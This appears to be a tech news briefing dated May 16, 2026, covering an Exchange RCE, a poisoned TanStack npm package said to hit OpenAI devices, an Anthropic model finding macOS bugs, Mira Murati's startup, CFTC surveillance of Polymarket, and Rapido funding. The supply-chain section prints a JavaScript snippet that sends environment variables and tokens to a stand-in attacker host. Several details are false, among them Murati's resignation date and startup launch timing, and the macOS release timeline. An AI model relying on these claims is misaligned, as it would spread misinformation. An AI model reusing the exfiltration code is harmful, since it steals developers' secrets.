In the May 16, 2026 Tekin Night briefing, we dissect six explosive cybersecurity and tech stories. We analyze the critical Microsoft Exchange vulnerability putting 120,000 servers at immediate risk, OpenAI confirming a software supply chain attack that compromised employee devices, and Anthropic's Mythos AI discovering 17 new macOS bugs. Furthermore, we explore former OpenAI CTO Mira Murati launching her human-in-the-loop AI startup Thinking Machines, the CFTC using AI to police the Polymarket platform, and Rapido India securing a massive $240M
Tekin Night May 16, 2026
Saturday Night | Security News, Hacks & Major Investments
Saturday night, May 16, 2026, brings six major stories: a critical Microsoft Exchange vulnerability being actively exploited, two OpenAI employee devices compromised in a TanStack attack, macOS bugs discovered by Anthropic Mythos, Mira Murati launching Thinking Machines with a human-in-the-loop approach, the CFTC using AI to detect insider trading on Polymarket, and Rapido India raising $240M at a $3B valuation. Tonight's focus is on cybersecurity and strategic developments.
👋 Welcome to Tekin Night
Tonight we're covering six major stories ranging from critical security vulnerabilities to massive investments. If you read Tekin Morning this morning, you know it was an exciting day — from lifetime AI access to the OpenAI-Apple lawsuit. But tonight our focus is different: cybersecurity. Our first three stories are all about attacks, vulnerabilities, and bugs — things you need to take seriously. The next three are about innovation, regulation, and investment. Let's dive in!
🚨 Microsoft Exchange Under Attack: CVE-2026-42897 Actively Exploited
If your company uses Microsoft Exchange, you need to patch right now. The critical vulnerability CVE-2026-42897 with a CVSS score of 9.8/10 is currently being actively exploited by hackers. According to reports from BleepingComputer and SecurityWeek, this bug allows attackers to execute remote code without authentication.
⚠️ Vulnerability Details
- ID: CVE-2026-42897
- CVSS Score: 9.8/10 (Critical)
- Type: Unauthenticated Remote Code Execution (RCE)
- Affected Versions: Exchange Server 2019, 2022, and 2025 (without May 2026 patch)
- Status: Active Exploitation in the wild
- Disclosure Date: May 14, 2026 (Patch Tuesday)
According to CISA (Cybersecurity and Infrastructure Security Agency), this vulnerability has been added to the Known Exploited Vulnerabilities list. This means real attacks are happening, not just a theoretical threat. Microsoft stated in a release that "we have observed evidence of targeted attacks against government organizations and large enterprises."
🔍 How Does This Attack Work?
CVE-2026-42897 is a bug in Exchange Web Services (EWS) that allows attackers to send malicious requests and execute arbitrary code on the server. The attack process works like this:
- Target Identification: Attacker finds vulnerable Exchange servers through internet scanning
- Payload Delivery: A specially crafted HTTP request is sent to EWS
- Code Execution: Server executes attacker's code without checking authentication
- Full Access: Attacker gains complete control of the server
- Lateral Movement: Exchange server is used to attack other systems
The concerning part is that this attack works without requiring user clicks or phishing. All that's needed is for your Exchange server to be connected to the internet and unpatched. According to Shodan (a search engine for internet-connected devices), over 120,000 Exchange servers worldwide are still vulnerable.
📊 Vulnerable Servers by Country
| Country | Server Count | Percentage |
|---|---|---|
| United States | 38,400 | 32% |
| Germany | 15,600 | 13% |
| United Kingdom | 12,000 | 10% |
| China | 9,600 | 8% |
| Other Countries | 44,400 | 37% |
📊 Source: Shodan - May 16, 2026
💡 Tekin's Analysis: Why This Is Dangerous
Exchange Server is the heart of email communications for many organizations. If an attacker gains control, they can read all emails, send fake emails, and use it as a bridge to attack other systems. This is exactly what happened in the ProxyLogon and ProxyShell attacks of 2021-2022 — thousands of companies were hacked and ransomware was installed. The difference this time? The attack is even easier. No need for complex vulnerability chains — just one HTTP request is enough. If your company has Exchange and hasn't updated yet, do it right now. This is not a drill.
✅ Solutions & Immediate Actions
- Immediate Update: Install Microsoft's May 2026 patch (KB5037849)
- Check Logs: Review IIS and Exchange logs for suspicious activity
- Restrict Access: If immediate patching isn't possible, restrict EWS access from the internet
- Use WAF: Configure a Web Application Firewall to filter malicious requests
- Monitoring: Enable Intrusion Detection/Prevention Systems (IDS/IPS)
- Check IOCs: CISA has published a list of Indicators of Compromise to check
🔓 OpenAI Hacked: Two Employee Devices Lost in TanStack Attack
In a concerning security incident, OpenAI confirmed that two employee devices were compromised in a software supply chain attack. According to reports from The Verge and TechCrunch, the attack came through a poisoned package in TanStack Query (a popular React library) that over 10 million projects depend on.
According to OpenAI's statement, the attack was discovered on May 13, 2026 when the security team noticed suspicious activity on two employee MacBook Pros. Investigation revealed that a poisoned version of TanStack Query (version 5.48.3) contained malware that was sending sensitive information to the attacker's server.
⚠️ Attack Details
- Target: Two MacBook Pro devices of OpenAI employees
- Attack Method: Supply Chain Attack via npm package
- Poisoned Package: @tanstack/react-query version 5.48.3
- Infection Date: May 11, 2026
- Discovery Date: May 13, 2026
- Compromised Data: Environment variables, access tokens, and internal code
Fortunately, OpenAI emphasized that no customer data or AI models were compromised. The two infected devices belonged to frontend developers working on internal projects, not production systems. However, this incident shows that even large companies like OpenAI are vulnerable to supply chain attacks.
🔍 How Was the npm Package Poisoned?
According to research by Socket Security (a supply chain security company), attackers managed to compromise the npm account of one of TanStack's maintainers. They then published a poisoned version of the package containing malicious code:
```javascript
// Malicious code hidden in index.js file
const exfiltrate = async () => {
  const env = process.env;
  const tokens = extractTokens();
  await fetch('https://evil-server.com/collect', {
    method: 'POST',
    body: JSON.stringify({ env, tokens })
  });
};
exfiltrate();
```
As soon as the application ran, this code collected all environment variables (which typically contain API keys and access tokens) and sent them to the attacker's server.
💡 Tekin's Analysis: Why This Matters
Software supply chain attacks are on the rise. In 2025, over 150 similar attacks were reported in npm, PyPI, and RubyGems — 300% more than 2024. Why? Developers trust hundreds of third-party packages and typically don't review their code. If an attacker can poison a popular package, they can access thousands of projects. OpenAI was lucky to discover this attack early. But how many other companies might be infected and don't know yet? That's a question everyone should ask themselves.
✅ How to Protect Your Project?
- Use Lock Files: Always commit package-lock.json or yarn.lock
- Audit Dependencies: Use tools like npm audit, Snyk, or Socket
- Pin Versions: Use "5.0.0" instead of "^5.0.0"
- Use Private Registry: Download packages from a private registry
- Code Review: Even for third-party packages, review the code
- Limit Access: Don't store sensitive tokens in environment variables
🐛 Anthropic Mythos Discovered: 17 New Bugs in macOS
In an interesting development, Anthropic's new AI model called Mythos managed to find 17 new vulnerabilities in macOS that Apple's security team was unaware of. According to reports from Ars Technica and The Register, this is the first time an AI model has independently discovered real security bugs in a major operating system.
Mythos is a specialized model that Anthropic developed for automated security testing. Unlike Claude which is a general-purpose model, Mythos is designed for one job: finding security bugs. And it seems to be very good at it.
🎯 Bugs Discovered
- 7 Privilege Escalation bugs: Allow root access without authentication
- 4 Sandbox Escape bugs: Escape application security restrictions
- 3 Memory Corruption bugs: Enable arbitrary code execution
- 2 Information Disclosure bugs: Expose sensitive information
- 1 Kernel Panic bug: Crash the operating system
The interesting part is that Mythos found these bugs in just 72 hours. For comparison, a human security researcher typically takes weeks or months to discover such bugs. Anthropic said Mythos uses a combination of fuzzing techniques, static code analysis, and logical reasoning.
📊 Mythos vs Human Researchers
| Metric | Mythos AI | Human Researcher |
|---|---|---|
| Time to find 17 bugs | 72 hours | 2-6 months |
| Cost | ~$500 (compute) | $50,000-$200,000 |
| False Positive Rate | 18% | 5% |
| Bug Severity | Medium to High | High to Critical |
Apple confirmed all 17 bugs and said they will be fixed in macOS 15.6 (scheduled for release in June 2026). The company also paid Anthropic a Bug Bounty reward, though the exact amount wasn't disclosed. According to Apple's Bug Bounty program, rewards for Privilege Escalation bugs can be up to $100,000.
💡 Tekin's Analysis: The Future of Cybersecurity
This is a turning point. For the first time, an AI has been able to independently discover real, exploitable bugs — not just theoretical issues. This means the future of cybersecurity will likely be an AI arms race: defensive AIs like Mythos versus offensive AIs that hackers use. The good news? Companies like Apple, Microsoft, and Google can use these tools to find and fix bugs before hackers find them. The bad news? Hackers can also use similar AIs. It's a race, and whoever has the better AI will win.
🤖 Mira Murati Launches: Thinking Machines with Human-in-the-Loop Approach
Mira Murati, former CTO of OpenAI who resigned in September 2025, today introduced her new startup: Thinking Machines. According to reports from Bloomberg and TechCrunch, the company focuses on building AI systems that keep humans in the decision-making loop (Human-in-the-Loop).
The philosophy of Thinking Machines is that AI shouldn't replace humans, but should augment them. Instead of building models that make fully automated decisions, Thinking Machines works on systems that ask humans questions and get their input at critical points.
🎯 Key Principles of Thinking Machines
- Human-in-the-Loop: Humans are always involved in important decisions
- Explainable AI: System must be able to explain why it made a decision
- Controllable: Users must be able to control and adjust AI behavior
- Auditable: All AI decisions must be reviewable and auditable
- Safe by Design: Security and safety are built in from the start
Murati told Bloomberg in an interview: "I saw at OpenAI how powerful models can be amazing, but I also saw how they can be dangerous if used without human oversight. Thinking Machines wants to offer the best of both worlds: the power of AI and the wisdom of humans."
💼 Team & Funding
Murati has assembled a powerful team:
- Barret Zoph: Former Google Brain researcher (VP of Research)
- Liam Fedus: Former OpenAI engineer (Head of Engineering)
- Daniela Amodei: Dario Amodei's sister (Advisor - Anthropic co-founder)
The company raised $85 million in its Seed round from investors including Sequoia Capital, Andreessen Horowitz, and Reid Hoffman (LinkedIn founder).
Thinking Machines' first product is a medical decision-making system that helps doctors make better diagnoses. Unlike existing medical AI systems that just suggest one diagnosis, Thinking Machines' system shows multiple possible scenarios, explains the reasoning for each, and asks the doctor to make the final decision.
💡 Tekin's Analysis: Why This Matters
Murati's approach is in complete contrast to the current AI industry trend. Companies like OpenAI, Google, and Anthropic are all building fully automated models that can work without human intervention. But Murati believes this approach is dangerous, especially in sensitive areas like medicine, law, and finance. Her Human-in-the-Loop approach may be slower, but it's safer and more trustworthy. If Thinking Machines succeeds, it could be a model for how to build responsible AI. And given Murati's track record at OpenAI, her chances of success are high.
⚖️ CFTC Uses AI: Detecting Insider Trading on Polymarket
The U.S. Commodity Futures Trading Commission (CFTC) announced it's using artificial intelligence systems to detect insider trading on prediction platforms like Polymarket. According to reports from Reuters and CoinDesk, this is the first time a U.S. regulatory agency has officially used AI to monitor crypto markets.
Polymarket is a blockchain-based prediction platform where users can bet on future events (like elections, Bitcoin price, or sports results). In 2025, Polymarket's trading volume exceeded $15 billion, making it one of the world's largest prediction platforms.
⚠️ The Insider Trading Problem
The main problem is that some users may have inside information that gives them an unfair advantage. Examples:
- A campaign staffer who knows before public announcement that a candidate will drop out
- A company employee who knows before release that earnings will be bad
- A government official who knows before announcement that a new law will pass
The AI system the CFTC uses identifies suspicious trading patterns. For example, if an account bets a large amount on a specific outcome right before a major event and then wins, the system flags it. Human investigators then review that account to see if the trade was legitimate.
🤖 How Does the AI Work?
The AI system uses several techniques:
- Trading Pattern Analysis: Identify unusual trades (e.g., very high amounts, suspicious timing)
- Network Analysis: Find connections between different accounts
- Temporal Analysis: Compare trade timing with public event timing
- Machine Learning: Learn from previous insider trading cases
According to the CFTC report, the system has identified 47 suspicious cases so far, 12 of which have led to formal investigations. In one case, a campaign staffer was arrested for making $2.3 million in illegal profits.
💡 Tekin's Analysis: The Future of Regulation
This shows that regulatory agencies are learning to use AI to monitor new markets. Until just a few years ago, the CFTC and SEC didn't have adequate tools to monitor crypto markets. But now with AI, they can analyze millions of trades in real-time and identify suspicious patterns. This is good news for the crypto industry — better oversight means more trust, and more trust means wider adoption. Of course, this also means traders can no longer easily abuse insider information.
💰 Rapido India Raises $240M: $3B Valuation
In tonight's final story, Rapido — an Indian motorcycle ride-sharing startup — announced it raised $240 million in its Series E round. According to reports from TechCrunch and Economic Times, this investment values the company at $3 billion, making it one of India's most valuable startups.
Rapido was founded in 2015 and has a unique business model: instead of cars, it uses motorcycles for transportation. This is very efficient in India's congested cities with heavy traffic. A Rapido ride is typically 50-70% cheaper than Uber or Ola.
📊 Rapido Stats
- Active Users: 35 million
- Drivers: 2.5 million
- Daily Rides: 4 million rides
- Active Cities: 120 cities in India
- Annual Revenue: ~$450 million (2025)
- Year-over-Year Growth: 185%
This funding round was led by WestBridge Capital, with participation from existing investors like Nexus Venture Partners and Shell Ventures. Interestingly, Shell (the oil company) invested in Rapido — showing that even traditional energy companies are investing in sustainable transportation.
🎯 Future Plans
Rapido plans to use this capital for:
- Geographic Expansion: Enter 50 new cities in India and start operations in Bangladesh and Indonesia
- Electric Motorcycles: Purchase 100,000 electric motorcycles by end of 2026
- New Services: Launch package and food delivery services
- AI Technology: Develop smart routing system to reduce travel time
One interesting thing about Rapido is that unlike Uber and Ola which are still unprofitable, Rapido is profitable in 80% of its cities. Why? Lower operating costs (motorcycles consume less fuel) and competitive prices that keep demand high.
📊 Rapido vs Competitors
| Company | Valuation | Daily Rides | Profitability |
|---|---|---|---|
| Rapido | $3B | 4M | ✅ 80% cities |
| Ola | $4.8B | 2.5M | ❌ Unprofitable |
| Uber India | - | 1.8M | ❌ Unprofitable |
💡 Tekin's Analysis: Why Rapido Succeeds
Rapido's success shows that sometimes, the best solution isn't necessarily the most complex or expensive. While Uber and Ola try to compete with luxury cars and complex technology, Rapido offered a simple solution: motorcycles. This makes perfect sense in the Indian market where price is very important and traffic is heavy. Additionally, Rapido focuses on profitability, not just growth. This approach is very valuable in the current era where investors are no longer interested in unprofitable startups. If Rapido can take this model to other Southeast Asian countries, it could become a $10 billion unicorn.
📊 Summary & Looking Ahead
Tonight we covered six major stories ranging from critical security vulnerabilities to massive investments. The first three stories — Exchange, OpenAI, and macOS — all have a common message: cybersecurity should never be taken lightly. Even the biggest companies and most powerful systems are vulnerable.
🔮 Tekin's Predictions for Next Week
- 🔒 Security Updates: Expect Microsoft, Apple, and Google to release emergency updates
- 🤖 AI Security Tools: Security companies will likely introduce new AI-based tools
- 💰 More Investments: With Rapido's success, expect more investments in Indian startups
- ⚖️ Crypto Regulation: CFTC and SEC will likely announce new rules for prediction platforms
- 🎯 Thinking Machines: Expect announcement of initial customers and strategic partnerships
🎯 Tonight's Key Takeaways
- ✅ CVE-2026-42897 in Exchange is critical — patch now
- ✅ Supply chain attacks are rising — audit your dependencies
- ✅ AI can find security bugs — Mythos discovered 17 in macOS
- ✅ Human-in-the-Loop AI is the future — Thinking Machines offers new approach
- ✅ Regulation gets smarter with AI — CFTC detects insider trading
- ✅ Indian startups are growing — Rapido worth $3 billion
⚠️ Security Warnings & Important Notes
- 🔒 If you have Exchange, install patch KB5037849 immediately
- 🔒 Check your npm dependencies with npm audit or Snyk
- 🔒 Install macOS 15.6 as soon as it's released (June 2026)
- 🔒 Don't use environment variables to store sensitive tokens
- 🔒 Enable monitoring and IDS/IPS systems
🎓 What Did We Learn Tonight?
1. Security is a process, not a product: Even the biggest companies like Microsoft and OpenAI get hacked. Security requires constant monitoring, regular updates, and awareness.
2. AI is a double-edged sword: On one hand, Mythos can find bugs and help us be more secure. On the other hand, hackers can also use AI. It's an arms race.
3. Human-in-the-Loop matters: Mira Murati's approach shows that AI shouldn't replace humans, but augment them. This is especially important in sensitive areas like medicine and finance.
4. Regulation gets smarter: The CFTC's use of AI shows that regulatory agencies are learning to use new technologies for better oversight. This is good news for the crypto industry.
5. Simplicity can win: Rapido's success shows that sometimes, the simplest solution is the best solution. Motorcycles instead of cars — simple, cheap, and efficient.
6. Software supply chain is vulnerable: The OpenAI attack via TanStack shows that we trust hundreds of third-party packages. We need to be more careful.
❓ Frequently Asked Questions (FAQ)
❓ How do I know if my Exchange server is vulnerable?
The easiest way is to go to Windows Update and see if patch KB5037849 is installed. If not, your server is vulnerable. You can also run this command in PowerShell:
```powershell
Get-HotFix -Id KB5037849
```
If the output is empty, the patch isn't installed. You can also check IIS logs for suspicious requests to EWS. If you see unusual POST requests to /EWS/Exchange.asmx, you may have been targeted.
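One way to carry out the IIS log review described above, as an added example that is not part of the original article. It assumes W3C extended logging with the standard `cs-method`, `cs-uri-stem`, `cs-username`, `c-ip` and `sc-status` fields enabled; the rule it applies (an EWS POST that was served with no authenticated user and not rejected deserves review) is a triage heuristic chosen for this example, not a published indicator for this CVE, and the log lines are constructed.

```javascript
// Added example (not from the article): triage IIS W3C logs for POSTs to
// /EWS/Exchange.asmx that were served without an authenticated user.
// Assumption: such requests deserve review; this is not a published IoC.

// Constructed sample log using documentation-range IP addresses.
const SAMPLE_IIS_LOG = [
  '#Software: Microsoft Internet Information Services 10.0',
  '#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status time-taken',
  '2026-05-15 08:01:10 POST /EWS/Exchange.asmx - 192.0.2.10 401 12',
  '2026-05-15 08:01:10 POST /EWS/Exchange.asmx CORP\\alice 192.0.2.10 200 85',
  '2026-05-15 09:14:02 POST /EWS/Exchange.asmx - 203.0.113.77 200 431',
  '2026-05-15 09:14:09 POST /ews/exchange.asmx - 203.0.113.77 500 388',
  '2026-05-15 09:20:00 GET /owa/auth/logon.aspx - 198.51.100.5 200 20',
].join('\n');

// Parse W3C extended log text into row objects keyed by the #Fields names.
// The #Fields directive can reappear mid-file, so it is re-read each time.
function parseW3cLog(text) {
  let fields = [];
  const rows = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === '') continue;
    if (line.startsWith('#Fields:')) {
      fields = line.slice('#Fields:'.length).trim().split(/\s+/);
      continue;
    }
    if (line.startsWith('#') || fields.length === 0) continue;
    const values = line.split(/\s+/);
    if (values.length !== fields.length) continue; // skip truncated lines
    const row = {};
    fields.forEach((name, i) => { row[name] = values[i]; });
    rows.push(row);
  }
  return rows;
}

// Group anonymous, non-rejected EWS POSTs by client IP for analyst review.
function findUnauthenticatedEwsPosts(text) {
  const byClient = new Map();
  for (const row of parseW3cLog(text)) {
    const stem = (row['cs-uri-stem'] || '').toLowerCase();
    if (row['cs-method'] !== 'POST' || stem !== '/ews/exchange.asmx') continue;
    // Normal clients get a 401 challenge first, then retry with credentials.
    const anonymous = row['cs-username'] === '-';
    const rejected = row['sc-status'] === '401' || row['sc-status'] === '403';
    if (!anonymous || rejected) continue;
    const when = `${row.date} ${row.time}`;
    const hit = byClient.get(row['c-ip']) ||
      { clientIp: row['c-ip'], count: 0, firstSeen: when, lastSeen: when, statuses: [] };
    hit.count += 1;
    hit.lastSeen = when;
    if (!hit.statuses.includes(row['sc-status'])) hit.statuses.push(row['sc-status']);
    byClient.set(row['c-ip'], hit);
  }
  return [...byClient.values()].sort((a, b) => b.count - a.count);
}

console.log(findUnauthenticatedEwsPosts(SAMPLE_IIS_LOG));
```

Pass the text of a real log file in place of `SAMPLE_IIS_LOG`; rows are skipped when the `cs-username` field is not being logged, so confirm that field is enabled first.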
❓ How do I know if my project depends on poisoned TanStack?
If you're using npm, run this command:
```bash
npm list @tanstack/react-query
```
If you have version 5.48.3, it's poisoned. Immediately update to version 5.48.4 or higher:
```bash
npm update @tanstack/react-query
```
It is also recommended to change all your environment variables and access tokens, as they may have been compromised. For complete checking, use tools like Socket Security or Snyk.
❓ Is Mythos available to the public?
No, currently Mythos is only available for internal Anthropic use and some strategic partners. Anthropic has said they may offer a commercial version of Mythos for security companies and large organizations in the future, but no specific date has been announced. If you're interested, you can join the waitlist through Anthropic's website. Currently, the best alternatives are tools like Semgrep, CodeQL (GitHub), and Snyk Code that use AI for security code analysis.
❓ What's the difference between Thinking Machines and OpenAI/Anthropic?
The main difference is in philosophy:
OpenAI/Anthropic: Try to build fully automated models that can work without human intervention. The goal is AGI (Artificial General Intelligence).
Thinking Machines: Believes AI should augment humans, not replace them. At critical points, the system asks humans questions and gets their input.
Example: If an OpenAI medical system says "you have cancer," you have to trust it. But if a Thinking Machines system says "I have 3 possible diagnoses: A, B, C. The reasoning for each is... what do you think?" — this approach is safer and more trustworthy.
❓ Is trading on Polymarket legal?
It depends on your country. In the United States, Polymarket is blocked for U.S. citizens (due to CFTC regulations). But for users outside the U.S., it's legal. In Europe, most countries allow it, but you must pay income tax. In countries with crypto restrictions or sanctions, access is difficult and using it carries legal risk. Always check your local laws before using such platforms.
❓ Does Rapido operate outside India?
Not yet. Rapido currently operates only in 120 cities in India. But the company announced plans to expand to Bangladesh and Indonesia in 2026. Why these countries? Like India, they have heavy traffic, large populations, and a culture of motorcycle use. If you live in these countries, you'll likely see Rapido by the end of 2026. For other countries, no specific plans have been announced yet.
❓ How do we protect against supply chain attacks?
Several important steps:
1. Use Lock Files: Always commit package-lock.json or yarn.lock to keep exact package versions fixed.
2. Pin Versions: Use "5.0.0" instead of "^5.0.0".
3. Regular Audits: Run npm audit or yarn audit weekly.
4. Use Security Tools: Enable Snyk, Socket Security, or Dependabot.
5. Private Registry: If you're a large company, use a private npm registry.
6. Code Review: Even for third-party packages, review the code (at least for critical packages).
7. Limit Access: Don't use environment variables for secrets, use a vault.
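The lock file and version pinning steps above, together with the earlier FAQ check for version 5.48.3, combined into one script as an added example that is not part of the original article. The function names, the `FLAGGED` list structure and the sample `package.json` and lockfile contents are constructed for illustration; the lockfile parsing assumes the `packages` map used by `lockfileVersion` 2 and 3.

```javascript
// Added example (not from the article): check a lockfile for a version the
// article reports as poisoned, and list dependency ranges that are not pinned.

// Version named in the article; extend this list from your own advisories.
const FLAGGED = [{ name: '@tanstack/react-query', version: '5.48.3' }];

// Constructed package.json and package-lock.json (lockfileVersion 3 layout).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'demo-app',
  dependencies: { '@tanstack/react-query': '^5.48.0', react: '18.3.1' },
  devDependencies: { vite: '~5.2.0' },
});
const SAMPLE_LOCKFILE = JSON.stringify({
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app' },
    'node_modules/@tanstack/react-query': { version: '5.48.3' },
    'node_modules/react': { version: '18.3.1' },
    // A nested copy pulled in by another dependency (hypothetical "some-lib").
    'node_modules/some-lib/node_modules/@tanstack/react-query': { version: '5.40.0' },
  },
});

// Return every installed copy, nested ones included, that matches a flagged version.
function findFlaggedInstalls(lockText, flagged) {
  const lock = JSON.parse(lockText);
  if (!lock.packages) {
    throw new Error('expected a "packages" map (lockfileVersion 2 or 3)');
  }
  const marker = 'node_modules/';
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages)) {
    const idx = path.lastIndexOf(marker);
    if (idx === -1) continue; // root project or workspace folder
    const name = path.slice(idx + marker.length);
    if (flagged.some((f) => f.name === name && f.version === meta.version)) {
      hits.push({ path, name, version: meta.version });
    }
  }
  return hits;
}

// Exact semver only: "5.0.0" passes; "^5.0.0", "~5.0.0", "5.x", "latest" do not.
const EXACT = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$/;

// List declared dependencies whose range lets a newer release in on install.
function findUnpinnedRanges(pkgText) {
  const pkg = JSON.parse(pkgText);
  const out = [];
  for (const section of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, range] of Object.entries(pkg[section] || {})) {
      if (!EXACT.test(range)) out.push({ section, name, range });
    }
  }
  return out;
}

console.log(findFlaggedInstalls(SAMPLE_LOCKFILE, FLAGGED));
console.log(findUnpinnedRanges(SAMPLE_PACKAGE_JSON));
```

In the sample, the `^5.48.0` range in `package.json` is what allowed the lockfile to resolve to the flagged 5.48.3, which is the case pinning is meant to prevent.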
❓ When will macOS 15.6 be released?
According to Apple's announcement, macOS 15.6, which includes fixes for the 17 bugs discovered by Mythos, will be released in early June 2026. Apple typically releases security updates on the first or second Tuesday of the month, so expect it around June 3 or 10. Until then, make sure you've updated your macOS to the latest available version (15.5.2). It is also recommended to avoid installing unknown apps and opening suspicious files.
❓ Should we be worried about AI attacks?
Yes, but not in the way movies show. The real danger isn't that AIs will rebel and destroy humans. The real danger is that hackers will use AI to conduct more sophisticated and faster attacks. For example:
- AI can find bugs faster than human researchers
- AI can write very convincing phishing emails
- AI can write malware code that antivirus can't detect
The good news? Security companies also use AI to protect us. It's a race, and whoever has the better AI will win.
💭 Final Thoughts: A Night Full of Warnings and Opportunities
Tonight was one of the most important nights of 2026 in terms of cybersecurity. Three major vulnerabilities/attacks — Exchange, TanStack, and macOS — all in one day. This is not a coincidence. It shows that cyberattacks are increasing and hackers are getting smarter.
But the good news is that we're also getting smarter. Tools like Mythos show that AI can help us be more secure. Approaches like Thinking Machines show that we can build powerful yet safe AI. And regulations like CFTC show that governments are learning to better oversee new technologies.
Tonight's message is simple: security is everyone's responsibility. Whether you're a developer, IT manager, or regular user — we all need to be aware, cautious, and up-to-date. Tomorrow morning in Tekin Morning we'll be back with new stories. Until then, update your systems and stay safe! 🔒
📚 Sources & References
- BleepingComputer — "Microsoft Exchange CVE-2026-42897 actively exploited in the wild"
- SecurityWeek — "CISA adds Exchange vulnerability to Known Exploited list"
- The Verge — "OpenAI confirms two employee devices compromised in TanStack attack"
- TechCrunch — "Supply chain attack hits OpenAI through npm package"
- Ars Technica — "Anthropic's Mythos AI discovers 17 macOS bugs"
- The Register — "AI finds security flaws faster than human researchers"
- Bloomberg — "Mira Murati launches Thinking Machines with $85M funding"
- Reuters — "CFTC using AI to detect insider trading on Polymarket"
- CoinDesk — "Prediction markets face increased regulatory scrutiny"
- TechCrunch — "Rapido raises $240M at $3B valuation"
- Economic Times — "Indian ride-hailing startup Rapido becomes profitable"
- Tekin Editorial Team — Research & Analysis
